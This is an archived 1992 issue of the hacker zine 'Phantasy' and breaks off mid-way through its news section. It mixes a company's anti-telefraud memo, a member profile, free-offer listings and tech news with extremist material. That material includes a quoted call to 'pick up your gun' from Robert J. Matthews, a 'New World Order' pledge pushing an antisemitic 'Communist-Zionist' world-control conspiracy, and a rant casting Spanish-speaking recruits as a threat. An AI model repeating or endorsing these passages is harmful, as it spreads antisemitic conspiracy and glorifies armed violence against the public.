home *** CD-ROM | disk | FTP | other *** search
/ Black Crawling Systems Archive Release 1.0 / Black Crawling Systems Archive Release 1.0 (L0pht Heavy Industries, Inc.)(1997).ISO / iirg / phan03.08 < prev    next >
Text File  |  1994-12-27  |  53KB  |  1,237 lines

  1.       -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  2.       =                                                               =
  3.       -                WELCOME TO THE EIGHTH ISSUE OF                 -
  4.       =                                                               =
  5.       -                        -=>PHANTASY<=-                         -
  6.       =                                                               =
  7.       -               A PUBLICATION AND NEWSLETTER OF                 -
  8.       =                                                               =
  9.       -                             THE                               -
  10.       =                        INTERNATIONAL                          =
  11.       -                         INFORMATION                           -
  12.       =                          RETRIEVAL                            =
  13.       -                            GUILD                              -
  14.       =                                                               =
  15.       -        Hacking,Phreaking,Anarchy,Survivalism,Commentary       -
  16.       =                                                               =
  17.       -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  18.  
  19.            Volume Number Three,Issue Number Eight Dated 6/05/92
  20.                Editor: Mercenary@f515.n141.z1.fidonet.org
  21.  
  22.              Article Submissions: The Mercenary/IIRG
  23.                                   862 Farmington Avenue
  24.                                   Suite 306
  25.                                   Bristol,Ct 06010
  26.  
  27.            IIRG World Headquarters BBS: Dark Shadows
  28.                                         19.2/9600 Baud HST
  29.                                         24 Hours a Day
  30.                                         1.2 Gigs Online
  31.                                         (203)-628-9660
  32.  
  33.         Table of Discontents:
  34.  
  35.  
  36.           [1] Quick Comment
  37.               By: Mercenary
  38.  
  39.           [2] Communists Alive and Well in the U.S.
  40.               By: Red Dawn
  41.  
  42.           [3] TeleFraud: (A Case Example)
  43.               By: Anonymous
  44.  
  45.           [4] IIRG Members Profiles: Rowdy Roddy Piper
  46.  
  47.           [5] New World Order Pledge of Dis-Allegiance
  48.               Provided By: Saint Anarchy
  49.  
  50.           [6] IIRG FREEBIES: New Section Devoted to promotions
  51.                              available to our readers!
  52.  
  53.           [7] PHANTASY TIDBITS: News and Views of Interest
  54.  
  55.  
  56.           [8] FOR THE PEOPLE
  57.               Supplied By: Bulletin Boards Across the Country
  58.               Edited by: Mercenary
  59.  
  60.                       1. Michelangelo Source Code
  61.                       2. Phil Katz Warning
  62.                       3. Virus Poem
  63.  
  64.  
  65.           [9] Listing of PHANTASY Distribution Sites
  66.  
  67. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  68.  
  69.     OFFICIAL DISLAIMER...
  70.  
  71.     All information in PHANTASY is from USER contributed material
  72.     The Publishers and Editors of PHANTASY and THE IIRG disclaim
  73.     any liability from any damages of any type that the reader or
  74.     user of such information contained within this newsletter may encounter
  75.     from the use of said information. All files are brought to you for
  76.     entertainment purposes only! We also assume all information infringes
  77.     no copyrights and hereby disclaim any liability.
  78.  
  79.     PHANTASY is (C) 1990 by The IIRG
  80.     IIRG and INTERNATIONAL INFORMATION RETRIEVAL GUILD is (C) 1982
  81.  
  82. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  83.  
  84.  Section [1]: Quick Comment
  85.               By: Mercenary
  86.  
  87.         ATTENTION!! All File creators,Publishers,BBS-aholics
  88.                     the Former IIRG WHQ Runestone BBS is gone.
  89.                     Please do not list it in your files.
  90.                     The New WHQ is:
  91.  
  92.  
  93.            IIRG World Headquarters BBS: Dark Shadows
  94.                                         19.2/9600 Baud HST
  95.                                         24 Hours a Day
  96.                                         1.2 Gigs Online
  97.                                         (203)-628-9660
  98.  
  99.  
  100. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  101.  
  102.  Section [2]: Communists Alive and Well in the U.S.
  103.               By: Red Dawn
  104.  
  105.   The Berlin Wall came down, and its about time. But the RED Menace is alive
  106.  and Well folks. The So called Russian Republics (Soviet DisUnion) haven't
  107.  gone anywhere. So why are the piss ant politicians in the U.S. rolling over
  108.  and playing Dead? Money, Yes its that simple Money.
  109.   One world Government means power and power means money and as long as our
  110.  leaders are more concerned about filling thier pockets and not filling
  111.  peoples stomachs, were on our own.
  112.   The Chinese Communists just exploded the largest underground nuclear blast
  113.  ever, the Soviets still have there nukes and the PLP is alive and well here
  114.  in the U.S.
  115.   On a recent jaunt up to MIT, I was approached by a PLP (Progressive Labor
  116.  Party) member. The PLP is the American Communist Party for those who are new
  117.  to this. He asked if I'd like to buy a copy of "Challenge" (The Revolutionary
  118.  Communist Newspaper) I said No, but I'll take this copy for free comrade.
  119.  and walked off with the poor little Reds paper.
  120.   NOTE: Please dont feel bad for the Red, Communism states whats yours is mine
  121.         so I was just teaching him about true Communism control
  122.   Now the PLP is getting smart, they are recruiting Puerto Ricans and other
  123.  third world spanish speakers, as the lead story is "STOP RACIST REPATRIATION
  124.  OF HAITANS" and the paper is now half spanish.
  125.   What better way to boost your cause then appeal to an already unrestful
  126.  group of people.
  127.   Well I say enough, lets show the Communists that we can take America Back
  128.  by unseating mailing them your thoughts.
  129.  
  130.  I'd Advise this on a Post Card:
  131.  
  132.   We Love America,and not Karl Marx.... Signed a Concerned American
  133.  
  134.  Mail to: The Progressive Labor Party
  135.           231 West 29th Street
  136.           Room 502
  137.           New York,NY 10001
  138.  
  139.  Or Call: (212)-629-0002
  140.  
  141. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  142.  
  143.  GIVE YOUR SOUL TO GOD AND PICK UP YOUR GUN, ITS TIME TO DEAL IN LEAD.
  144.  WE ARE THE LEGIONS OF THE DAMNED,THE ARMY OF THE ALREADY DEAD.
  145.  
  146.                                    Robert J. Matthews
  147.  
  148. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  149.  
  150.  Section [3]: TeleFraud: (A Case Example)
  151.               By: Anonymous
  152.  
  153.   Hacking and Phreaking has long been a game of cat and mouse, between
  154.  Hacker and System Administrator. In a role reversal I'd like to present
  155.  the response of an Undisclosed Insurance Company to hackers penetrating
  156.  thier system by presenting the memo distributed to system operators.
  157.  
  158. -------------------------------------------------------------------------------
  159.  From the Director of Systems Security to all employees:
  160.  
  161.   We have experienced telephone fraud (TeleFraud) in which outsiders,
  162.  (I.E. Hackers) penetrated a regional office telephone system and made long
  163.  distance calls that were charged to the company (In one case the cost of
  164.  those calls was about $27,000) A number of steps are being implemented to
  165.  elimanate this exposure) We want to inform you about some of them, and ask
  166.  for your help and cooperation.
  167.  
  168.  NOTE: This article may contain terminology new to you. A "Definition of Terms"
  169.        is included on the last page to help clarify these terms.
  170.  
  171.  
  172.  BACKGROUND:
  173.  
  174.   The most common form of telefraud involves the use of 800 numbers,credit
  175.   cards, and third party calling. Hackers get these numbers from a number of
  176.   sources, such as:
  177.  
  178.   A. Advertisements
  179.  
  180.   B. Eavesdropping (e.g. when you charge your telephone call to another number
  181.      while using a public telephone)
  182.  
  183.   C. Using old company telephone books and manuals that contain numbers of
  184.      Key System or Private Branch Exchange (PBX) systems, which are the heart
  185.      of our internal telephone system.
  186.  
  187.   Technically sophisticated hackers dial these numbers, and through computer
  188.  program routines, determine authorization codes.
  189.   Having learned these codes, they post them on computer bulletin boards or
  190.  sell them. Literally within minutes unauthorized calls are passing through
  191.  the system.
  192.   To reduce or eliminate this exposure, our department as well as others are
  193.  working together to protect our telephone systems. Some of these protection
  194.  measures include:
  195.  
  196.  1. Development and implementation of controls in conjuction with our telephone
  197.     vendors (e.g. AT&T and MCI) to restrict access to certain telephone
  198.     features. Some of these controls include prohibiting the use of Remote
  199.     Access,trunk to trunk,and DISA services.
  200.  
  201.  2. Making you, as telephone users, aware of this problem and identifying ways
  202.     you can help. This memo is part of this program.
  203.  
  204.  HOW CAN YOU HELP?:
  205.  
  206.  Here are some suggestions:
  207.  
  208.  Telephone Credit Cards:
  209.  
  210.   1. Don't give your credit card number to anyone
  211.   2. When calling from a payphone, use card readers whenever possible.
  212.   3. Don't read the number loud enough for others to hear, or let others
  213.      observe you entering your number.
  214.   4. Report lost or stolen cards immediately.
  215.   5. Use your body to block the view of someone who may be watching to see the
  216.      access code you are punching into the telephone.
  217.  
  218.  800 Service:
  219.  
  220.   1. Don't install an 800 number unless it's absolutely necessary.
  221.   2. Remove the line when it's no longer needed.
  222.   3. Limit 800 service to applications that are answered by people.
  223.   4. Avoid 800 service to Phonemail or Voice Response Units (VRU).
  224.  
  225.  International/Domestic Toll Calls:
  226.  
  227.   1. Block country and/or area codes that you don't call.
  228.   2. Limit the use of International Class of Service at the handset level.
  229.   3. Block 900 calls with the local telephone company.
  230.  
  231.  Dial Data Lines:
  232.  
  233.   1. Block third party calling with the local telephone company.
  234.   2. Establish VNET range restrictions
  235.  
  236.  Remote Access:
  237.  
  238.   1. Disable this feature on the PBX. We have surveyed our PBX vendors
  239.      country-wide to ensure these facilities are not enabled.
  240.  
  241.  Trunk-to-Trunk:
  242.  
  243.   1. Disable this feature on the PBX. We have surveyed our PBX vendors
  244.      country-wide to ensure these facilities are not enabled.
  245.  
  246.  Phonemail:
  247.  
  248.   1. Change passwords frequently
  249.   2. Deactivate unused mailboxes
  250.   3. Limit the number of "Guest" mailboxes
  251.   4. Don't publish the system access number to anyone who doesn't use
  252.      phonemail.
  253.   5. Lock out the subscriber after three unsuccessful attempts to enter the
  254.      mailbox.
  255.   6. Keep system administrator ID's secret and change them frequently.
  256.  
  257.  Third Party Calling:
  258.  
  259.   1. Request the local telephone company to block third party calling on
  260.      dial data,fax,and private lines.
  261.   2. Limit the installation of private lines
  262.  
  263.  PBX (Private Branch Exchange):
  264.  
  265.   1. Do not reveal maintenance port passwords to callers without positive ID
  266.   2. Delete unused extensions
  267.  
  268.  VRU (Voice Response Units):
  269.  
  270.   1. Do not enable trunk-to-trunk transfer.
  271.   2. Program only a select number of extensions to which callers can be
  272.      transferred (i.e. establish a table of extensions).
  273.   3. Do not program station transfer
  274.   4. Passwords, (e.g. logon ID's customer PIN's) should be carefully protected
  275.      and changed frequently.
  276.  
  277.  Automated Attendant:
  278.  
  279.   1. Do not enable trunk-to trunk transfer.
  280.   2. Do not program station transfer
  281.   3. Delete unused extensions
  282.   4. Deactivate software features if not in use.
  283.  
  284.  Hardcopy Listings:
  285.  
  286.   1. Properly dispose of old telephone books,manuals,or telephone bills that
  287.      contain sensitive telephone numbers.
  288.   2. Review all telephone charges,looking for patterns and excessive charges.
  289.  
  290.  Dial Access to Computers:
  291.  
  292.   1. Secure dial lines to all computer systems.
  293.  
  294.  Miscellaneous:
  295.  
  296.   1. Be cautious of unusual situations with your telephone system, such as
  297.      busy signals at odd times.
  298.  
  299.  
  300.                           DEFINITION OF TERMS
  301.  
  302.  
  303.    PBX
  304.  
  305.    Private Branch Exchange. Private automatic system that provides for the
  306.    switching of calls internally, and to and from the public telephone
  307.    network.
  308.  
  309.    Trunk-to-Trunk
  310.  
  311.    A "trunk" is the telephone line that connects a PBX to the telephone
  312.    company. Therefore a trunk-to-trunk connection ties a PBX system to the
  313.    telephone company.
  314.  
  315.    DISA
  316.  
  317.    Stands for Direct Inward System Access. This feature gives an outside
  318.    caller the ability to dial directly into a PBX system, without attendant
  319.    (i.e. operator) intervention, and gain access to the PBX system facilities
  320.    and outgoing circuits. DISA software should be disabled, thus eliminating
  321.    this feature/exposure.
  322.  
  323.    Voice Mail
  324.  
  325.    Hardware and software products that can be integrated or peripheral to a
  326.    PBX system, allowing users to send,receive,and redirect voice messages
  327.    through office telephone systems and computers.
  328.  
  329.    Automated Attendant
  330.  
  331.    An automated telephone system used to accept incoming calls and direct
  332.    their callers to specific extensions based upon the caller entering touch
  333.    tone numbers. For example, a hacker could call someones Voicemail mailbox
  334.    from the outside and try to break in.
  335.  
  336.    VRU (Voice Response Unit)
  337.  
  338.    An interactive system that interfaces between the PBX and host computer
  339.    based upon information provided by the caller (e.g. account number,social
  340.    security number)
  341.  
  342.    Remote Access
  343.  
  344.    Allows a caller at a remote location to access PBX features by telephone.
  345.    Individual authorization codes are usually required. Remote access allows
  346.    the caller to potentially access an outside (e.g. long distance) line,
  347.    and is usually accomplished through the use of DISA or automated
  348.    attendant features.
  349.  
  350.    VNET (Virtual Network)
  351.  
  352.    A registered MCI service that offers a range of telephone limits and/or
  353.    restrictions (e.g. allows calls only within U.S., does not allow calls to
  354.    Virgin Islands,etc.)
  355.  
  356.    Key System:
  357.  
  358.    A small, multi-line internal telephone system similar to a PBX.
  359.    Norstar,Spirit,and Merlin are examples of a key system.
  360.  
  361.  
  362.  
  363.    Remember: All of us are potential victims of telephone fraud. Hackers are
  364.              determined to use our telephone system and not pay for that
  365.              service. Please be as determined to ensure they do not.
  366.  
  367. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  368.  
  369.             ONE CRIME IS CONCEALED BY THE COMMISSION OF ANOTHER
  370.  
  371.                                                Seneca
  372.  
  373. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  374.  
  375.  Section [4]: IIRG Members Profiles: Rowdy Roddy Piper
  376.  
  377. ------------------------------------------------------------------------------
  378.                            Rowdy Roddy Piper
  379. ------------------------------------------------------------------------------
  380.  
  381. Handle: Rowdy Roddy Piper
  382. Call him: Piper
  383. Past handles: None
  384. Handle origin: Wrestler Rowdy Roddy Piper of WWF fame
  385. Past Computers: Commodore 64  With ICT Data Chief
  386.                 Commodore 128
  387.                 Amiga 1000
  388.                 286/12
  389.  
  390. Present Computer: 386/33
  391.                   1300 Megs Storage
  392.                   Courier HST
  393.                   Courier HST Dual Standard
  394.  
  395.  
  396. Sysop: Pipers Pit BBS
  397.  
  398. Background:
  399.  
  400.    Piper Started his original Commodore oriented BBS in March 1985. The Board
  401.   was originally run off of a C-64 with 2 SFD 1001's. Continually upgrading his
  402.   system Piper switched from his original C-Net configuration to Color 64
  403.   with a C-128 with 1750 Ram expander and 2 ICT Data Chief HFD20's.
  404.    It was at this time that Piper met Mercenary at the now defunct CompuTech
  405.   systems and started attending the original IIRG meetings at the Bar and
  406.   pizza joint next door.
  407.    With the Commodore community rapidly dwindling and the IIRG no longer
  408.   supporting the C64/128, Piper sold his Commodore BBS for a $400.00 profit
  409.   over what he invested in it and Bought a 286/12 and an Amiga 1000 with
  410.   1.5 megs.
  411.    Now, with the his vast majority of users being IBM, Piper has switched
  412.   to a 386/33 Tower with 1300 Megs of storage,2 Nodes (HST and HST D/S.
  413.    But being true to his roots, Piper still supports the Amiga line.
  414.  
  415.  
  416. Pipers Favorite Things
  417. ----------------------
  418.  
  419.      Running his BBS
  420.      Music (Extensive CD Collection)
  421.      The one month his phone bill ran under $100.00
  422.  
  423. Most Memorable Experiences
  424. --------------------------
  425.  
  426.      Selling his original commodore BBS for $400.00 more than he originally
  427.      purchased the Equipment for, and passing out at the 1989 IIRG Hack
  428.      Bash before the keg was tapped.
  429.  
  430.  
  431. People to Mention
  432. -----------------
  433.  Thanks to: Pie Man,
  434.             Mercenary, a downright strange individual
  435.             Anubis, an even stranger individual
  436.             The now defunct CompuTech systems and its owner Redbone
  437.  
  438.  Fucks to:  Internal Revenue, America's Legal Organized Crime Syndicate
  439.             Credit Bureaus, Go ahead---Make my Limit
  440.             and 95% of all elected officials
  441.  
  442. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  443.  
  444.     A NICKNAME IS THE HEAVIEST STONE THE DEVIL CAN THROW AT A MAN
  445.  
  446.                                                   Anon
  447.  
  448. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  449.  
  450.  Section [5]: New World Order Pledge of Dis-Allegiance
  451.               Provided By: Saint Anarchy
  452.  
  453.    As our brave and trustworthy leaders usher in there new world order,
  454.    I suggest each one of you memorize this Pledge to it.
  455.  
  456.    We pledge dis-allegiance to the United Nations flag and the confusion,
  457.   the treason,the wars,and the bloodshed for which it stands.
  458.    One World (under Satan), uniting all nations under one Communist-Zionist
  459.   international economic control.
  460.    Promoting (under the guise of benevolence and welfare) Metro Government,
  461.   Regionalization,Urban Renewal,Model Cities,causing distress to young and
  462.   old,totally changing our form of government, and working toward a One
  463.   World Bank (Acclomplished, a One World Government,and a One World Church,
  464.   without God and his Holy Word, the Bible. In his name we reject and defy
  465.   the United Nations Flag and the totalitarianism for which it stands.
  466.  
  467. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  468.  
  469.    FREEDOM HATH A THOUSAND CHARMS TO SHOW
  470.                          THAT SLAVES HOWE'ER CONTENDED NEVER KNOW
  471.  
  472.                                                Cowper
  473.  
  474. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  475.  
  476.  Section [6]: IIRG FREEBIES: A new section to Phantasy
  477.               BY: Mercenary
  478.  
  479. -------------------------------------------------------------------------------
  480.  [1] Security for VMS Systems Handbook
  481.      Available from Digital Equipment Corporation
  482.      Free of Charge
  483.      Call 1-800-332-4636 Extension: SECURE
  484. -------------------------------------------------------------------------------
  485.  [2] Free $15.00 Introductory Usage to CompuServe
  486.      Free Complimentary subscription to CompuServe Magazine
  487.      Compliments of Digital Equipment Corporation
  488.      Call 1-800-524-3388 Ask for Represenative #332
  489. -------------------------------------------------------------------------------
  490.  [3] ARAGO Professional dBASE
  491.      Call 1-800-228-3295
  492.      Ask for Free Demo Disk
  493. -------------------------------------------------------------------------------
  494.  [4] Flow Charting 3
  495.      Call 1-800-525-0082 Extension 1117
  496.      Ask for Free Interactive Demo Disk
  497. -------------------------------------------------------------------------------
  498.  [5] Vermont Views
  499.      Portable User-Interface for Dos,Unix,Posix,VMS...
  500.      Free Demo Kit
  501.      Call 1-800-848-1248
  502.      Mention Offer #303
  503. -------------------------------------------------------------------------------
  504.  [6] National Instruments
  505.      Lab Programs
  506.      Free Demo Disks
  507.      1-800-433-3488
  508. -------------------------------------------------------------------------------
  509. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  510.  
  511.  Section [7]: PHANTASY TIDBITS: News and Views of interest from around the
  512.                                 Computer World
  513.  
  514. -------------------------------------------------------------------------------
  515.  
  516.                        I GOT EM,I GOT EM, I GOT EM....
  517.  
  518.  Arizona Law officers are fuming that the U.S. Justice Department is taking
  519.  credit for the first successful prosecution under the Operation Sundevil
  520.  computer crime investigation. They point out that they nabbed and convicted
  521.  two hackers swept up in the nationwide crackdown on computer crime several
  522.  months ago. One of the hackers is still doing time in a halfway house after
  523.  spending six months in "shock incarceration," a boot camp for first time
  524.  offenders.
  525.  
  526. -------------------------------------------------------------------------------
  527.  
  528.                          POOR LITTLE BIG BROTHER....
  529.  
  530.  Difficulties tapping advanced digital telephone networks for criminal
  531.  investigations have inspired the Federal Bureau of Investigation to propose
  532.  legislation requiring carriers to modify their networks to accommodate court
  533.  approved wiretaps. The multimillion dollar cost of re-engineering the
  534.  networks would be borne by rate payers. Civil liberties groups said a built
  535.  in tapping capability might encourage overly broad government surveillance.
  536.  
  537. -------------------------------------------------------------------------------
  538.  
  539.               COULD I GET SOME MINT JELLY WITH THAT PLEASE?
  540.  
  541.  A man charged with stealing computer boards from Digital Equipment Corporation
  542.  between February and October 1990 recently received the severed head of a lamb
  543.  wrapped in towels through the U.S. Mail. The box arrived at the Lexington,
  544.  Mass., home of Edward Desmond Jr. on Feb 28th. Desmond had cooperated with the
  545.  government during part of the 2 1/2 year investigation, which led to the
  546.  indictment of 16 people. A plea agreement with Desmond was reportedly
  547.  rescinded after he was caught commiting other crimes.
  548.  
  549. -------------------------------------------------------------------------------
  550.  
  551.               INTERNET ADVISORY BOARD SETS S.N.M.P. SECURITY RULES
  552.  
  553.  The Simple Network Management Protocol (SNMP) security specifications now
  554.  before the Internet Advisory Board would provide the following features:
  555.  
  556.  1. A data-encryption standard based specification that encrypts messages
  557.     between the SNMP manager and agent. This is useful for sending down new or
  558.     updated keys that determine what management functions a SNMP station can
  559.     access or that define authorization levels within a station.
  560.  
  561.  2. Origin Authentication that prevents unauthorized users who have obtained
  562.     an SNMP workstations access code from masquerading as an authentic user.
  563.  
  564.  3. Replay protection that keeps a user from delaying an SNMP transmission,
  565.     such as a command to take a workstation offline, and sending it at a later
  566.     date.
  567.  
  568.  4. Message integrity that keeps authorized users from changing the contents
  569.     of a SNMP message.
  570.  
  571. -------------------------------------------------------------------------------
  572.  
  573.                   BOOK PUSHER SEEKS TO INFLATE EGO
  574.  
  575.  Computer Security Expert Winn Schwartau, whose book, Terminal Compromise,
  576.  describes how a terrorist gang could paralyze the U.S. with a computer virus,
  577.  sees a parrallel between his text and real life.
  578.  "When the Michelangelo virus scare began, it was eerie, like somone had lifted
  579.  the events right out of my book," he says. "Viruses are evolving into a
  580.  terrorist's weapon and are certainly a viable means of waging warfare."
  581.  Terminal compromise is published by Pittsburg-Based Inter-Pact press.
  582.  
  583.  IIRG Note: This Jack Ass will say anything to sell his book, so save the
  584.             $19.95 and go out and get drunk instead. The book is pure
  585.             garbage.
  586.  
  587. -------------------------------------------------------------------------------
  588.  
  589.                    JACKASS's and MORE JACKASS's
  590.  
  591.  The Associated press reports that the theft of a portable PC in Australia was
  592.  solved when the thief sent a fax to the unit's maker, DFM Systems of Des
  593.  Moines,Iowa asking for a power cord,documentation, and software.
  594.  What the crook didn't know was the DFM TraveLite PC was the only such system
  595.  in Australia. The unit was owned by Sydney based ACEL, which the thief had
  596.  burglarized. DFM contacted ACEL's managing director, who then contacted the
  597.  police. A ploice officer later contacted the crook, who had supplied his
  598.  street address on the fax.
  599.  
  600. -------------------------------------------------------------------------------
  601.  
  602.                 I HEAR YA' KNOCKIN, BUT YA' CAN'T COME IN
  603.  
  604.  Whozz Calling uses your local phone company's Caller ID service to intercept
  605.  the ID information before you answer your phone. The product sends the
  606.  identification of the caller via standard RS-232 serial wire to your computer
  607.  which looks up the caller name,displays it,stores it,elects not to answer the
  608.  call, or diverts the call to an answering machine.
  609.  A DOS compatible,menu driven TSR program can optionally pop up information
  610.  about the caller,bringing up the callers ID before you answer the phone.
  611.  
  612.  Price: $79.00 (Requires Caller ID)
  613.  Contact: Zeus Phonstuff
  614.           1000 Holcomb Woods Parkway
  615.           Suite 410-C
  616.           Roswell,GA 30076
  617.           (404)-587-1541
  618.           (404)-587-1609 (FAX)
  619.  
  620. -------------------------------------------------------------------------------
  621.  
  622.                 TWO AT CORNELL INDICTED IN VIRUS CASE
  623.  
  624.  Two Cornell University students now have been indicted for felonies in
  625.  connection with the computer virus case that came to light last
  626.  February at the Ithaca, N.Y., university.
  627.  
  628.  David Blumenthal and Mark Pilgrim are accused of embedding a virus in
  629.  three Apple Macintosh computer games that were sent from Cornell's
  630.  computer center to an archive at Stanford University. Authorities say
  631.  from there, the games were duplicated and wound up in computers across
  632.  the U.S., Japan and Great Britain.
  633.  
  634.  Blumenthal, 20, and Pilgrim, 19, who, in convicted, face a maximum
  635.  four years in prison, were arrested in February on misdemeanor
  636.  charges, which were increased to felonies because the virus is
  637.  believed to have caused more than $1,000 in damage, said county
  638.  District Attorney George Dentes.
  639.  
  640. -------------------------------------------------------------------------------
  641.        AT&T INTRODUCES PRODUCTS TO FIGHT PHONE FRAUD  NEW YORK (Reuter)
  642.  
  643. -- American Telephone & Telegraph Co. rolled out a new security program
  644. yesterday aimed at protecting businesses from anyone who might try to "steal"
  645. their long-distance telephone service.  Branding phone fraud as a nationwide
  646. problem costing upwards of $1.2 billion a year, the company said its AT&T
  647. NetProtect program gives customers the products, services and education they
  648. need to combat such fraud, as well as protection against financial liability.
  649.  
  650.   Long-Distance fraud often takes place when an outsider, say a computer
  651. hacker, cracks the access codes to a company's private branch exchange, or PBX
  652. -- an internal phone system that allows easy access to branch offices and major
  653. customers.  The PBX can then be used to place long-distance or international
  654. calls as if by someone inside the company.  The practice, a misdemeanor crime
  655. with no jail sentence in many states, typically is done for monetary gain. The
  656. "stolen" service can be sold on the street, sometimes providing drug
  657. traffickers with international calls that cannot be traced.  "Long-distance
  658. fraud is a serious criminal problem, and we believe AT&T should stand squarely
  659. with our customers against the criminals who steal the service," said Joseph
  660. Nacchio, president of AT&T's Business Communications Services division.  AT&T,
  661. the long-distance carrier created by the 1984 breakup of the former Bell
  662. telephone system, said its new program would relieve customers from liability
  663. for the fraud.  The company this week began monitoring its toll-free 800 service
  664. at no extra charge to prevent fraud. From Aug. 1, it also will monitor inter-
  665. national long-distance service to countries experiencing high levels of fraud.
  666.  
  667.   An AT&T spokesman declined to disclose the cost for enhanced and premium
  668. services that protect customers from financial liability, saying the cost
  669. structure has not yet been filed with the Federal Communications Commission.
  670.  
  671.   Other packages include a $1,995 software package that alerts customers to
  672. unusual calling patterns and a $150 an hour intervention service under which
  673. AT&T experts try to stop fraud while it is in progress.
  674. -------------------------------------------------------------------------------
  675.  
  676.                      WORLDWIDE MOBILE DATA SOLUTIONS
  677.  
  678.   ATLANTA -- May 18, 1992 -- Digital Equipment Corporation, RAM Mobile
  679.  Data, and BellSouth Enterprises, Inc. today announced a worldwide
  680.  agreement to provide mobile data solutions based on the Mobitex
  681.  mobile packet radio network.
  682.   Under the agreement, Digital will offer two-way wireless
  683.  electronic mail to its more than three million existing ALL-IN-1
  684.  integrated office system customers. Digital is developing a
  685.  version of its Mobilizer for ALL-IN-1 software that will enable
  686.  users of portable MS-DOS PCs to access ALL-IN-1 electronic mail
  687.  applications without a connection to a telephone outlet.
  688.   Digital plans to provide the same services on the Mobitex
  689.  mobile network in the United Kingdom. In addition, wireless
  690.  electronic mail services will be offered to customers in several
  691.  other countries where RAM and BellSouth plan to operate Mobitex
  692.  networks. Digital's wireless electronic mail offering will be
  693.  available in the first quarter of calendar year 1993.
  694.   Digital also announced the DECmobile program, under which
  695.  the company will deliver fully integrated, end-to-end mobile data
  696.  communications solutions that extend enterprise computing
  697.  networks to mobile users. The announcements were made at the ICA
  698.  telecommunications industry conference held here May 18-21.
  699.  "With these announcements, Digital is moving aggressively
  700.  into the fast-growing mobile data market," said Ernst E.
  701.  Wellhoener, vice president of Digital's Telecommunications
  702.  Business Group. "We are supporting our commitment with
  703.  substantial investments of time, money, and resources to build
  704.  the kinds of mobile data solutions our customers require."
  705.   Digital Becomes RAM Mobile Data Systems Integrator
  706.  Under the DECmobile program, Digital will offer customers
  707.  complete mobile data solutions, acting as systems integrator for
  708.  RAM Mobile Data and other service providers.  Digital will
  709.  provide a single point of contact for customers seeking to
  710.  benefit from new mobile data communications services.
  711.   Digital is entering into business relationships with leading
  712.  suppliers of radio modems, handheld PCs, and cellular devices.
  713.  The company currently has relationships with Ericsson Mobile
  714.  Communications AB, Fujitsu Personal Systems (formerly Poqet
  715.  Computer Corporation), and Husky Computers, Inc.
  716.  "The move into mobile data represents a natural progression
  717.  for Digital, a leader in providing networked computer systems and
  718.  one of the computer industry's foremost systems integrators,"
  719.  Wellhoener said.  "Our ability to provide 'one-stop shopping' for
  720.  mobile data solutions helps simplify what might otherwise be a
  721.  difficult process for our customers, enabling them to get
  722.  up-to-speed faster and more cost-effectively."
  723.   Wellhoener said Digital chose Mobitex networks because they
  724.  are feature-rich, sophisticated, and highly efficient. "And
  725.  perhaps most important, the worldwide scope of Mobitex networks
  726.  will enable us to meet the needs of today's multinational
  727.  enterprises," Wellhoener added.
  728.  
  729.   Mike Harrell, president of BellSouth Mobile Data, Inc., said
  730.  the alliance would enable mobile data network subscribers to take
  731.  advantage of Digital's worldwide systems integration
  732.  capabilities. "Aligning ourselves with an experienced systems
  733.  integrator ensures our network subscribers have the most
  734.  effective solutions," Harrell said. "We can now expand the market
  735.  for Mobitex into a broad range of networked computer applications."
  736.   Carl Robert Aron, chairman and CEO of RAM, said, "ALL-IN-1
  737.  is the world's leading host-based application that includes
  738.  electronic mail.  RAM's Mobitex network is the only mobile data
  739.  network in operation which automatically delivers E-mail messages
  740.  to mobile professionals wherever they are within the network
  741.  service area. The marriage of Mobitex and Mobilizer for ALL-IN-1
  742.  was inevitable."
  743.   Digital Develops Mobile Data Products and Programming Tools
  744.  In addition to developing a wireless interface for its
  745.  Mobilizer for ALL-IN-1 product, Digital is developing an open
  746.  software architecture and a single set of application programming
  747.  interfaces that will be available to software developers. The
  748.  architecture and application programming interfaces, or APIs,
  749.  facilitate the integration of new and existing mobile applications
  750.  for RAM's and other service providers' networks.  APIs make it easy
  751.  for developers to write mobile data applications.
  752.   BellSouth Mobile Data is a subsidiary of BellSouth
  753.  Enterprises, Inc., the holding company that manages a group of
  754.  companies for BellSouth Corporation that provide wireless
  755.  telecommunications, advertising and publishing, and
  756.  information-based services throughout the world.
  757.   RAM Mobile Data operates a wireless data communications
  758.  service in major metropolitan areas across the nation.  Using
  759.  RAM's service, companies exchange two-way messages and data with
  760.  field personnel equipped with mobile, portable, or handheld
